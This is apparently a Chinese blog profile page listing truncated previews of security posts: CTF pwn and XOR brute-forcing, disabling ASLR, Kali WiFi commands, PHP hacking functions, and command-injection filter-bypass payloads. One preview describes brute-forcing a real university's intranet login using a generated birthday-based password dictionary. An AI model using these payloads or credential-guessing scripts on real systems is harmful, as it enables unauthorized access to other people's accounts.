- 博客(10)
- 收藏
- 关注
原创 记录一次在Win7x64上遍历EPROCESS触发蓝屏后的Debug
定义PEPROCESS pEprocess;ULONG ulProcessID;ulProcessID = (ULONG)pEprocess + 0x180;用ULONG类型来截取pEprocess后运算会出现高32位清零,低32位存在数值,内存地址错误。mov rax,dword ptr ds:[rax]这条指令读取内存地址后触发0xc0000005内存越界访问异常遂改为PEPROCESS pEprocess;ULONGLONG ulProcessID;ulProcessID =
2021-09-29 02:31:27 229
转载 2021-06-25
w= Word (2 byte short integer)dw = DWord (4 byte integer)p = untyped pointerlp = generic long pointerlpsz = long pointer to a null-terminated stringhttps://www.vbforums.com/showthread.php?353039-What-do-w-dw-lpsz-etc-stand-for
2021-06-25 13:01:35 155
原创 2021-06-23
strlen(str)*sizeof(char)==strlen(str)wcslen(str)*sizeof(wchar_t)≠wcslen(strl)
2021-06-23 14:28:42 108
原创 通过更改DllCharacteristics关闭ASLR地址空间随机化
前言:在更改PE文件时,通过x32dbg调试发现imagebase并不是0x400000h,而是变化的值,于是了解到ASLR的概念工具:010Editor、x64dbg、PE知识步骤:1,在PE文件中定位到DLLCharacteristic结构体,其值为0x8410,换算到二进制属性如下图2,讲其中的DYNAMIC_BASE属性改为0,也就是将其改为0x81003,再次运行程序,通过x32dbg调试发现EntryPoint变成了4开头的...
2021-04-28 16:58:44 863
原创 针对简单Pwn溢出题的爆破
爆破大法好例子:BUUCTF rip首先得到源程序pwn1file pwn1checksec pwn1啥也没有,很好然后拖到IDA64分析一波发现漏洞函数,地址为 0x401186 ,很好祭出脚本,开始爆破from pwn import *def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
2021-04-19 01:20:43 1007
原创 某高校校园内网登录页面爆破
某高校校园内网登录默认密码为身份证后八位的前七位推断密码为生日加三位随机数,生成密码字典f = open('password.txt', mode='a+')for i in range(int(input()), int(input())): f.write('0' + str(i) + '\n') f.close通过WireShark抓包发现页面通过get请求提交参数,编写爆破脚本import jsonimport reimport threadingimport ti
2021-04-16 16:03:38 1398 1
原创 PHP COMMON HACKING FUNCTION
1、eval()2、print_r()3、system()4、scandir()5、echo()6、var_dump()7、show_source()8、highlight_file()
2021-04-13 23:51:58 204 2
原创 XOR解密思路------爆破
例子:2018 护网杯 迟来的签到题http://www.bmzclub.cn/challenges#2018%20%E6%8A%A4%E7%BD%91%E6%9D%AF%20%E8%BF%9F%E6%9D%A5%E7%9A%84%E7%AD%BE%E5%88%B0%E9%A2%98下载压缩包后发现像是base64加密字符串给了提示 easy_xor???故直接祭出脚本爆破python easy_xor.py > result && strings result |grep
2021-04-13 01:31:55 1814 4
原创 关于KaliLinux连接WiFi
1、使用wireless-tools连接open网络iwconfig wlan0 获取连接状态iwlist wlan0 scan 扫描可用热点iwconfig wlan0 mode ad-hoc 设置操作模式为 ad-hoc.iwconfig wlan0 essid your_essid 连接到开放网络iwconfig wlan0 essid your_essid freq 2432M 连接到开放网络的一个频道iwconfig wlan0 essid your_essid key your_ke
2021-04-12 22:52:26 6129 2
原创 CTF命令执行与绕过
浅谈CTF中命令执行与绕过的小技巧一、空格绕过1.cat<filename shell2.cat<>filename shell3.{cat,filename} shell4.%09 符号 php5.cat$IFS$9filename cat${IFS}filename shell二、命令分隔符号1.ls /;cat filename shell2.ls /&cat filename shell3.ls /|cat filename shell4.%0a p
2021-04-12 01:35:42 1450
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人